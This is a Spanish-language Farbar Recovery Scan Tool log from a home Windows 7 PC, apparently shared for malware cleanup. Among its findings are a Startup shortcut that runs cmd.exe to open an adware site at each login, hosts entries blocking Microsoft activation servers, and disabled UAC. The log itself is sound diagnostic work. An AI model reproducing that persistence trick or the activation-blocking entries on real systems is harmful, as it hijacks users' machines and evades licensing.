SearchScopes: HKU\S-1-5-21-1692793609-910991690-2205039242-1000 -> {2F3822DF-85FD-483C-B3AA-38ECD8118D39} URL = hxxps://ve.search.yahoo.com/search?p={searchTerms}&intl=ve&fr=yset_ie_syc_oracle&type=orcl_default&partnerexternal-oracle=external-oracle
BHO: E-Web Print -> {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} -> C:\Program Files\Epson Software\E-Web Print\ewps_tb.dll [2014-11-27] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_181\bin\ssv.dll [2018-07-26] (Oracle America, Inc. -> Oracle Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_181\bin\jp2ssv.dll [2018-07-26] (Oracle America, Inc. -> Oracle Corporation)
Toolbar: HKLM - E-Web Print - {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} - C:\Program Files\Epson Software\E-Web Print\ewps_tb.dll [2014-11-27] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
Toolbar: HKU\S-1-5-21-1692793609-910991690-2205039242-1000 -> Sin Nombre - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  Ningún archivo
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll [2006-10-27] (Microsoft Corporation -> Microsoft Corporation)

FireFox:
========
FF DefaultProfile: dqwbx6g2.default
FF ProfilePath: C:\Users\Familia Landaeta\AppData\Roaming\Mozilla\Firefox\Profiles\dqwbx6g2.default [2020-04-20]
FF Homepage: Mozilla\Firefox\Profiles\dqwbx6g2.default -> hxxp://www.google.com/
FF Extension: (Search and New Tab by Yahoo) - C:\Users\Familia Landaeta\AppData\Roaming\Mozilla\Firefox\Profiles\dqwbx6g2.default\Extensions\[email protected] [2017-04-10] [Heredado]
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Epson Software\E-Web Print\Firefox Add-on
FF Extension: (E-Web Print) - C:\Program Files\Epson Software\E-Web Print\Firefox Add-on [2016-10-09] [Heredado] [no firmado]
FF Plugin: @java.com/DTPlugin,version=11.181.2 -> C:\Program Files\Java\jre1.8.0_181\bin\dtplugin\npDeployJava1.dll [2018-07-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.181.2 -> C:\Program Files\Java\jre1.8.0_181\bin\plugin2\npjp2.dll [2018-07-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN -> VideoLAN)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-06-29] (Adobe Systems, Incorporated -> Adobe Systems Inc.)

Chrome: 
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default [2020-04-22]
CHR NewTab: Default ->  Not-active:"chrome-extension://dobeegjfclcaalnakkicjhgcbmjcghbp/newtab/newtab.html"
CHR Extension: (Presentaciones) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-02-08]
CHR Extension: (Documentos) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-02-08]
CHR Extension: (Google Drive) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-09-12]
CHR Extension: (YouTube) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-09-12]
CHR Extension: (TV Hero) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\dobeegjfclcaalnakkicjhgcbmjcghbp [2020-04-16]
CHR Extension: (Adobe Acrobat) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2020-04-16]
CHR Extension: (Hojas de cálculo) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-02-08]
CHR Extension: (Documentos de Google sin conexión) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-04-20]
CHR Extension: (AdBlock: el mejor bloqueador de anuncios) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2020-04-21]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-04-16]
CHR Extension: (Gmail) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-05-07]
CHR Extension: (Chrome Media Router) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-04-21]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Guest Profile [2018-11-24]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1 [2018-11-24]
CHR Extension: (Presentaciones de Google) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-12-08]
CHR Extension: (Google Docs) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2016-12-08]
CHR Extension: (Google Drive) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-12-08]
CHR Extension: (YouTube) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-12-08]
CHR Extension: (Hojas de cálculo de Google) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-12-08]
CHR Extension: (Documentos de Google sin conexión) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-12-08]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-12-08]
CHR Extension: (Gmail) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-12-08]
CHR Extension: (Chrome Media Router) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-12-08]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 2 [2018-07-11]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 3 [2018-11-24]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 5 [2018-07-11]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 6 [2018-07-11]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 7 [2018-07-11]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\System Profile [2018-11-24]
CHR HKLM\...\Chrome\Extension: [ibbfklbaljofpaanmpaeadejijfdddco]
CHR HKU\S-1-5-21-1692793609-910991690-2205039242-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]

==================== Servicios (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

S2 EpsonScanSvc; C:\Windows\system32\EscSvc.exe [122000 2011-12-12] (SEIKO EPSON Corporation -> Seiko Epson Corporation)
S2 EPSON_PM_RPCV4_05; C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_JT50RP.EXE [142432 2012-02-27] (SEIKO EPSON Corporation -> SEIKO EPSON CORPORATION)
S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2013-05-27] (Microsoft Windows -> Microsoft Corporation)

===================== Controladores (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

S3 hamachi; C:\Windows\System32\DRIVERS\hamachi.sys [27040 2017-03-02] (LogMeIn, Inc. -> LogMeIn, Inc.)
S3 RimUsb; C:\Windows\System32\Drivers\RimUsb.sys [22656 2007-05-14] (Microsoft Windows Hardware Compatibility Publisher -> Research In Motion Limited)
S3 RTL8167; C:\Windows\System32\DRIVERS\Rt86win7.sys [139776 2009-07-13] (Microsoft Windows -> Realtek Corporation )
S3 wdm_usb; C:\Windows\System32\DRIVERS\usb2ser.sys [128704 2016-08-16] (NGO -> MBB)
S3 fiddrv; no ImagePath
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
S3 XDva511; \??\C:\Windows\system32\XDva511.sys [X]

==================== NetSvcs (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)


==================== Un mes (creado) ===================

(Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)

2020-04-22 11:47 - 2020-04-22 11:48 - 000020775 _____ C:\Users\Familia Landaeta\Desktop\FRST.txt
2020-04-22 10:38 - 2020-04-22 10:39 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Local\Steam
2020-04-22 09:52 - 2020-04-22 11:41 - 000000000 ____D C:\Program Files\Steam
2020-04-22 09:52 - 2020-04-22 09:52 - 000000921 _____ C:\Users\Public\Desktop\Steam.lnk
2020-04-22 09:52 - 2020-04-22 09:52 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2020-04-22 09:52 - 2020-04-22 09:52 - 000000000 ____D C:\Program Files\Common Files\Steam
2020-04-22 03:14 - 2020-04-22 03:15 - 001573568 _____ C:\Users\Familia Landaeta\Downloads\steam-2020-01-17.exe
2020-04-21 10:16 - 2020-04-21 10:16 - 000002383 _____ C:\Users\Familia Landaeta\Desktop\Intel(R) Processor Identification Utility.lnk
2020-04-21 10:16 - 2020-04-21 10:16 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Local\Caphyon
2020-04-21 10:15 - 2020-04-21 10:15 - 000000000 ____D C:\ProgramData\Package Cache
2020-04-21 09:52 - 2020-04-21 09:52 - 000000000 ____D C:\Program Files\Intel Corporation
2020-04-21 09:47 - 2020-04-21 09:52 - 021381072 _____ (Intel Corporation) C:\Users\Familia Landaeta\Downloads\Intel(R) Processor Identification Utility.exe
2020-04-21 08:51 - 2020-04-21 08:51 - 000001160 _____ C:\Users\Familia Landaeta\Desktop\Play UGGunz!.lnk
2020-04-21 00:25 - 2020-04-21 02:51 - 581405066 _____ C:\Users\Familia Landaeta\Downloads\gunzv10.exe
2020-04-20 18:29 - 2020-04-21 02:09 - 000000000 ____D C:\Users\Public\BlueStacks
2020-04-20 18:28 - 2020-04-21 20:25 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Local\Bluestacks
2020-04-20 18:28 - 2020-04-20 18:28 - 000998072 _____ (BlueStack Systems Inc.) C:\Users\Familia Landaeta\Downloads\BlueStacksInstaller_4.190.0.5002_native_53674e065a3fa5d20ea925fe2672c89c.exe
2020-04-20 13:03 - 2020-04-20 13:04 - 000038958 _____ C:\Users\Familia Landaeta\Downloads\Addition.txt
2020-04-20 13:02 - 2020-04-20 13:04 - 000026632 _____ C:\Users\Familia Landaeta\Downloads\FRST.txt
2020-04-20 13:02 - 2020-04-20 13:02 - 000000300 ____H C:\Windows\Tasks\CCleaner Update.job
2020-04-20 13:01 - 2020-04-22 11:47 - 000000000 ____D C:\FRST
2020-04-20 13:00 - 2020-04-22 11:46 - 000270318 _____ C:\Windows\ntbtlog.txt
2020-04-20 12:20 - 2020-04-20 12:28 - 002009600 _____ (Farbar) C:\Users\Familia Landaeta\Desktop\FRST.exe
2020-04-20 08:59 - 2020-04-20 09:03 - 022267336 _____ (Piriform Software Ltd) C:\Users\Familia Landaeta\Downloads\ccsetup565 (1).exe
2020-04-19 18:31 - 2020-04-19 18:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Highresolution Enterprises
2020-04-19 18:31 - 2020-04-19 18:31 - 000000000 ____D C:\Program Files\Highresolution Enterprises
2020-04-19 18:28 - 2020-04-19 18:31 - 002713952 _____ C:\Users\Familia Landaeta\Downloads\x-mouse-button-control-2-19.exe
2020-04-17 11:34 - 2020-04-17 16:45 - 022267336 _____ (Piriform Software Ltd) C:\Users\Familia Landaeta\Downloads\ccsetup565.exe
2020-04-17 06:31 - 2020-04-17 06:31 - 000000000 _____ C:\Users\Familia Landaeta\AppData\Local\php.zip
2020-04-16 11:01 - 2020-04-16 15:58 - 000002238 _____ C:\Users\Public\Desktop\League of Legends.lnk
2020-04-16 10:38 - 2020-04-16 11:08 - 000000000 ____D C:\Users\Familia Landaeta\Desktop\Riot Games
2020-04-16 10:38 - 2020-04-16 11:01 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Riot Games
2020-04-16 10:38 - 2020-04-16 10:38 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Riot Games
2020-04-16 10:32 - 2020-04-16 19:09 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Local\Riot Games
2020-04-16 10:03 - 2020-04-16 10:17 - 068993192 _____ (Riot Games, Inc.) C:\Users\Familia Landaeta\Downloads\Install League of Legends la1.exe

==================== Un mes (modificado) ==================

(Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)

2020-04-22 11:46 - 2018-11-21 13:14 - 000252416 ___SH C:\Users\Familia Landaeta\Downloads\Thumbs.db
2020-04-22 11:45 - 2009-07-14 00:34 - 000022528 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2020-04-22 11:45 - 2009-07-14 00:34 - 000022528 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2020-04-22 11:41 - 2019-02-05 08:51 - 000000000 ___HD C:\Users\Familia Landaeta\AppData\Local\aoxfre
2020-04-22 11:41 - 2009-07-14 00:53 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-04-22 10:43 - 2009-07-13 22:37 - 000000000 ____D C:\Windows\tracing
2020-04-22 03:08 - 2018-07-11 10:33 - 000000093 _____ C:\Windows\UGGLauncher.INI
2020-04-21 21:29 - 2019-02-05 08:42 - 000137216 ___SH C:\Users\Familia Landaeta\Desktop\Thumbs.db
2020-04-21 21:12 - 2016-09-12 11:35 - 000000000 ____D C:\Program Files\Google
2020-04-21 20:26 - 2016-09-12 11:35 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Local\Google
2020-04-21 17:04 - 2016-09-12 11:42 - 000004050 _____ C:\Windows\system32\Tasks\User_Feed_Synchronization-{6BA31EE6-0E9C-4B23-991B-FCF4330E17DB}
2020-04-21 10:06 - 2010-11-20 20:30 - 000750824 _____ C:\Windows\system32\perfh00A.dat
2020-04-21 10:06 - 2010-11-20 20:30 - 000159866 _____ C:\Windows\system32\perfc00A.dat
2020-04-21 10:06 - 2010-11-20 17:01 - 001658694 _____ C:\Windows\system32\PerfStringBackup.INI
2020-04-21 10:06 - 2009-07-13 22:37 - 000000000 ____D C:\Windows\inf
2020-04-21 08:51 - 2018-07-11 10:33 - 000001190 _____ C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Play UGGunz!.lnk
2020-04-20 19:53 - 2016-09-12 11:46 - 000002168 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-04-20 15:45 - 2018-12-04 09:02 - 000000000 ____D C:\Users\Familia Landaeta\Desktop\Pendrive
2020-04-20 13:05 - 2016-10-17 10:44 - 000000000 ____D C:\Users\Familia Landaeta\Desktop\Games
2020-04-20 13:02 - 2018-11-19 11:24 - 000096768 ___SH C:\Users\Familia Landaeta\Documents\Thumbs.db
2020-04-19 11:25 - 2018-02-08 17:11 - 000004464 _____ C:\Windows\system32\Tasks\Adobe Acrobat Update Task
2020-04-16 11:07 - 2016-09-21 12:10 - 000000000 ____D C:\ProgramData\Riot Games
2020-04-16 10:37 - 2018-03-13 00:16 - 000000000 ____D C:\Users\Familia Landaeta\Documents\Discord
2020-04-16 10:20 - 2016-09-12 11:35 - 000003524 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2020-04-16 10:20 - 2016-09-12 11:35 - 000003396 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2020-04-16 09:42 - 2009-07-13 22:37 - 000000000 ____D C:\Windows\system32\NDF
2020-04-16 09:23 - 2019-04-13 03:35 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Local\ElevatedDiagnostics
2020-04-08 17:01 - 2017-01-22 15:53 - 000000000 ____D C:\Program Files\Counter-Strike 1.6

==================== Archivos en la raíz de algunos directorios ========

2020-04-17 06:31 - 2020-04-17 06:31 - 000000000 _____ () C:\Users\Familia Landaeta\AppData\Local\php.zip
2016-12-15 03:13 - 2016-12-15 03:14 - 000000000 _____ () C:\Users\Familia Landaeta\AppData\Local\{42A7229B-167F-4CEB-928F-88DF4E1A435E}

==================== SigCheck ============================

(No existe una corrección automática para los archivos que no pasan la verificación.)


LastRegBack: 2020-04-19 13:05
==================== Final de FRST.txt ========================
Resultados del Análisis Adicional de Farbar Recovery Scan Tool (x86) Versión: 19-04-2020
Ejecutado por Familia Landaeta (22-04-2020 11:48:17)
Ejecutado desde C:\Users\Familia Landaeta\Desktop
Microsoft Windows 7 Ultimate  Service Pack 1 (X86) (2016-09-12 15:27:10)
Modo de Inicio: Safe Mode (minimal)
==========================================================


==================== Cuentas: =============================

Administrador (S-1-5-21-1692793609-910991690-2205039242-500 - Administrator - Disabled)
Familia Landaeta (S-1-5-21-1692793609-910991690-2205039242-1000 - Administrator - Enabled) => C:\Users\Familia Landaeta
HomeGroupUser$ (S-1-5-21-1692793609-910991690-2205039242-1002 - Limited - Enabled)
Invitado (S-1-5-21-1692793609-910991690-2205039242-501 - Limited - Disabled)

==================== Centro de Seguridad ========================

(Si una entrada es incluida en el fixlist, será eliminada.)

AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Programas instalados ======================

(Solo los programas de adware con indicador "Oculto", pueden ser añadidos al fixlist para hacerlos visibles. Los programas adware deben ser desinstalados manualmente.)

Adobe Acrobat Reader DC - Español (HKLM\...\{AC76BA86-7AD7-1034-7B44-AC0F074E4100}) (Version: 18.011.20063 - Adobe Systems Incorporated)
Akamai NetSession Interface (HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Akamai) (Version:  - Akamai Technologies, Inc)
Cheating-Death 4.33.4 (HKLM\...\Cheating-Death) (Version:  - )
Counter-Strike 1.6 (HKLM\...\Counter-Strike 1.6_is1) (Version: Counter-Strike 1.6 No Steam - KingSOFT DVD)
Epson E-Web Print (HKLM\...\{6BF9F374-EC67-4808-A90C-F127DE6D989D}) (Version: 1.23.0000 - SEIKO EPSON CORPORATION)
EPSON L355 Series Printer Uninstall (HKLM\...\EPSON L355 Series) (Version:  - SEIKO EPSON Corporation)
EPSON Scan (HKLM\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)
Epson Software Updater (HKLM\...\{7BAC3F7A-B963-468E-982E-B5608A87408D}) (Version: 4.4.4 - SEIKO EPSON CORPORATION)
FIFA 14 versión 1.1 (HKLM\...\{A119D7FE-EF42-497D-A87A-C27F106E883E}_is1) (Version: 1.1 - )
Google Chrome (HKLM\...\Google Chrome) (Version: 81.0.4044.113 - Google LLC)
Google Update Helper (HKLM\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.451 - Google LLC) Hidden
Hero Editor V0.96 (C:\Program Files\Hero Editor\) (HKLM\...\ST6UNST #2) (Version:  - )
Hero Editor V0.96 (HKLM\...\ST6UNST #1) (Version:  - )
Intel® Processor Identification Utility (HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Utilidad Intel® para identificación de procesadores 6.3.0404) (Version: 6.3.0404 - Intel Corporation)
Java 8 Update 181 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F32180181F0}) (Version: 8.0.1810.13 - Oracle Corporation)
League of Legends (HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Riot Game league_of_legends.live) (Version:  - Riot Games, Inc)
Microsoft .NET Framework 4.6.1 (español) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 3082) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM\...\{402ED4A1-8F5B-387A-8688-997ABF58B8F2}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24212 (HKLM\...\{462f63a8-6347-4894-a1b3-dbfe3a4c981d}) (Version: 14.0.24212.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML4 Parser (HKLM\...\{01501EBA-EC35-4F9F-8889-3BE346E5DA13}) (Version: 1.0.0 - Microsoft Game Studios)
Steam (HKLM\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Utilidad Intel® para identificación de procesadores (HKLM\...\{285B6614-95B6-4F8E-BE81-CFAE1DB22D57}) (Version: 6.3.0404 - Intel Corporation) Hidden
VLC media player (HKLM\...\VLC media player) (Version: 2.2.1 - VideoLAN)
WinRAR 4.20 (32-bit) (HKLM\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)
X-Mouse Button Control 2.19 (HKLM\...\X-Mouse Button Control) (Version: 2.19 - Highresolution Enterprises)

==================== Personalizado CLSID (Lista blanca): ==============

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

CustomCLSID: HKU\S-1-5-21-1692793609-910991690-2205039242-1000_Classes\CLSID\{305CA226-D286-468e-B848-2B2E8E697B74}\Shell\Open\Command -> C:\Users\Familia Landaeta\AppData\Local\Akamai\ControlPanel.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
ShellExecuteHooks: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2210608 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2012-06-09] (Alexander Roshal) [Archivo no firmado]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2010-08-25] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2012-06-09] (Alexander Roshal) [Archivo no firmado]

==================== Codecs (Lista blanca) ====================

==================== Accesos directos & WMI ========================

(Las entradas pueden ser listadas para ser restauradas o eliminadas.)

WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
ShortcutWithArgument: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> /c explorer hxxp://www2.savemax.store/

==================== Módulos cargados (Lista blanca) =============

2016-09-12 11:32 - 2012-06-09 19:50 - 000167936 _____ (Alexander Roshal) [Archivo no firmado] C:\Program Files\WinRAR\rarext.dll
2016-09-21 11:56 - 2016-09-21 11:56 - 000097280 _____ (Microsoft Corporation) [Archivo no firmado] C:\Windows\WinSxS\x86_microsoft.vc80.atl_1fc8b3b9a1e18e3b_8.0.50727.4053_none_d1c738ec43578ea1\ATL80.DLL

==================== Alternate Data Streams (Lista blanca) ========

==================== Modo Seguro (Lista blanca) ==================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El "AlternateShell" será restaurado.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="1"

==================== Asociación (Lista blanca) =================

==================== Internet Explorer sitios de confianza/restringidos ==========

(Si una entrada es incluida en el fixlist, será eliminada del registro.)

IE restricted site: HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\xnxx.com -> www.xnxx.com

==================== Hosts contenido: =========================

(Si es necesario, la directiva Hosts: puede ser incluida en el fixlist para restablecer Hosts.)

2009-07-13 22:04 - 2016-09-12 13:03 - 000000925 _____ C:\Windows\system32\drivers\etc\hosts
127.0.0.1 genuine.microsoft.com
127.0.0.1 mpa.one.microsoft.com
127.0.0.1 sls.microsoft.com

==================== Otras Áreas ===========================

(Actualmente no existe una corrección automática para esta sección.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: El medio no está conectado a internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)

==================== MSCONFIG/TASK MANAGER elementos deshabilitados ==

==================== Reglas de firewall (Lista blanca) ================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

FirewallRules: [{1D304C31-0E0B-427B-A209-E245AA1DBA0E}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe Ningún archivo
FirewallRules: [TCP Query User{08E9F88E-7164-4C9B-A5E3-8425DF8A0747}C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe] => (Allow) C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe Ningún archivo
FirewallRules: [UDP Query User{7C01576F-27B7-45E5-A1CE-685AAF5261B6}C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe] => (Allow) C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe Ningún archivo
FirewallRules: [{F4D4EDBD-9721-405F-9C5A-4B95FD161921}] => (Allow) C:\Program Files\GameforgeLive\Games\ESP_spa\Elsword\data\x2.exe Ningún archivo
FirewallRules: [{18C624E3-74F8-4BBF-B2EE-630BC42AB14A}] => (Allow) C:\Program Files\GameforgeLive\Games\ESP_spa\Elsword\data\x2.exe Ningún archivo
FirewallRules: [{4C2EA450-FCEB-48E3-8469-496CA762A139}] => (Allow) E:\GameforgeLive\Games\ESP_spa\Elsword\data\x2.exe Ningún archivo
